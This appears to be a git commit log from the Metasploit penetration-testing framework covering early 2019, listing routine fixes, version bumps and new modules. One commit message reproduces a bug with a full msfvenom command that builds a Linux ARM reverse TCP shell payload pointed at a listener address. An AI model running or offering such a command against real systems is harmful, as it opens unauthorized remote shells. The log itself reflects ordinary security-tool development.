Nathan
2d7c075f81
undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class
...
```
msfvenom -p linux/armle/shell_reverse_tcp lport=1337 lhost=192.168.1.100 -f elf-so > shell.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 172 bytes
Error: undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class
Did you mean? to_linux_armle_elf
to_linux_x64_elf_dll
to_linux_x86_elf_dll```
2019-02-03 16:34:30 +11:00
Spencer McIntyre
0908d5a2d2
Rename default_options to describe_payload_options
2019-02-02 15:01:05 -05:00
Brendan Coles
28283809f9
Add nil check to enum_patches
2019-02-02 15:33:48 +00:00
h00die
c5bfee1df7
add jtr to creds command
2019-02-01 20:25:03 -05:00
Brendan Coles
787c4400e4
Add Solaris pfexec Upgrade Shell module
2019-02-01 22:58:21 +00:00
Metasploit
3f35c82674
automatic module_metadata_base.json update
2019-02-01 14:38:15 -08:00
bwatters
239cce53ea
Land #11039 , Add linux x64 ipv6 reverse shell
...
Merge branch 'land-11039' into upstream-master
2019-02-01 16:21:24 -06:00
Metasploit
804c441425
Bump version of framework to 5.0.5
2019-02-01 13:44:12 -08:00
Metasploit
bb850f7b51
automatic module_metadata_base.json update
2019-02-01 13:29:24 -08:00
Wei Chen
7fe381ac60
Land #11309 , Normalize newlines in CommandShell#run_single
2019-02-01 15:17:24 -06:00
William Vu
d4211b1399
Land #11343 , Ubiquiti discovery PR fixes
2019-02-01 15:11:23 -06:00
William Vu
61b468ac7d
Add URL reference to blog post
2019-02-01 14:49:33 -06:00
William Vu
181d61621f
Count to five correctly
2019-02-01 14:40:43 -06:00
William Vu
7b88277c6f
Prefer case statement over long if block
2019-02-01 14:40:09 -06:00
Brendan Coles
47a13ea0e8
Modify Post read_file to check if file is readable
2019-02-01 19:44:18 +00:00
bwatters
2640ecb4c4
Land #11338 , Add module to discover Ubiquiti devices
...
Merge branch 'land-11338' into upstream-master
2019-02-01 11:40:52 -06:00
Wei Chen
ba69a0b26a
Land #11310 , MSF API to zip instead of relying on system()
2019-02-01 11:32:20 -06:00
Spencer McIntyre
6343280364
Clean up external evasion module options
2019-02-01 11:54:22 -05:00
Brendan Coles
d9e3fb7d2c
Land #11339 , Move command_exists? method to Msf::Post::Common
2019-02-01 16:07:47 +00:00
William Vu
62560f9581
Add rudimentary Windows support to command_exists?
2019-01-31 22:07:30 -06:00
William Vu
d0d383c8db
Move command_exists? to Msf::Post::Common
2019-01-31 22:04:29 -06:00
Jon Hart
f0519a5af5
Minor syntax; add logging for unhandled fields
2019-01-31 18:41:27 -08:00
Jeffrey Martin
5cf97fd09b
remove nolonger used variable
2019-01-31 13:05:02 -06:00
Spencer McIntyre
162139ee1d
Keep advanced options in the same list
2019-01-31 13:41:18 -05:00
spinfoo
07e2f9c166
added documentation
2019-01-31 19:24:47 +01:00
Jeffrey Martin
3c6e2160b9
remove spec tests nolonger valid after app removed
2019-01-31 12:14:30 -06:00
Jeffrey Martin
35ec947c17
remove is_server/is_client and `app` search term
2019-01-31 12:14:25 -06:00
Metasploit
7633c2832a
Bump version of framework to 5.0.4
2019-01-31 10:05:02 -08:00
Jeffrey Martin
a4d413348b
improve definition of `server/client` modules
...
update the cached data to define server vs client base on the
type of exploit module instead of the module stance.
2019-01-31 11:52:22 -06:00
bwatters
0feab5520b
Land #13366 , Bump mettle 0.5.4
...
Merge branch 'land-11336' into upstream-master
2019-01-31 11:23:41 -06:00
Jeffrey Martin
5a63e629e4
update payload sizes for mettle 0.5.4
2019-01-31 00:12:45 -06:00
Jeffrey Martin
153d54eb1d
bump mettle gem for liblinenoise / console update
2019-01-31 00:06:27 -06:00
h00die
0ac3004fe1
fix review comments
2019-01-30 20:27:19 -05:00
h00die
9f6b9d586b
updating jtr formats in hashdumpers
2019-01-30 20:16:08 -05:00
Jon Hart
4681ed9669
Update docs, strip empty essid
2019-01-30 14:31:20 -08:00
Jon Hart
603d2a0c04
Add docs
2019-01-30 14:26:15 -08:00
Jon Hart
96d612fb40
WIP commit on module to disover Ubiquiti devices on 10001/UDP
2019-01-30 14:19:02 -08:00
h00die
da27c3eeae
centralize hash to jtr formatting
2019-01-30 16:24:05 -05:00
William Vu
70cc03b707
Land #11329 , sessions -k range fix
2019-01-30 11:26:47 -06:00
Brent Cook
2ee7256342
Land #11332 , Add support for mettle debug
2019-01-30 11:05:45 -06:00
h00die
e2c1d0d7fa
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into c2password
2019-01-29 16:37:39 -05:00
h00die
febb049668
more info for c2s
2019-01-29 16:36:06 -05:00
h00die
95ae4996eb
spelling and spacing
2019-01-29 16:24:35 -05:00
h00die
4c14815343
c2s dvr password disclosure
2019-01-29 16:18:30 -05:00
bwatters
2e7a71ee9b
Add support for mettle debug
2019-01-29 15:13:44 -06:00
Matthew Kienow
fbd0412cf0
Increase pool size for remote data service tests
2019-01-29 13:57:54 -05:00
Jeffrey Martin
4e0ea64c96
Land #11330 , Fix HTTP/SMB mixin order to restore SSL option
2019-01-29 11:19:38 -06:00
William Vu
b7bc52d20b
Fix HTTP/SMB mixin order to restore SSL option
...
Mixin order matters. Mixins kinda suck.
2019-01-29 11:09:34 -06:00
Spencer McIntyre
acded21f0c
Support default options for external modules
2019-01-29 11:29:18 -05:00
Spencer McIntyre
a1b5fcc6d5
Support to_handler for evasion modules
2019-01-29 11:06:08 -05:00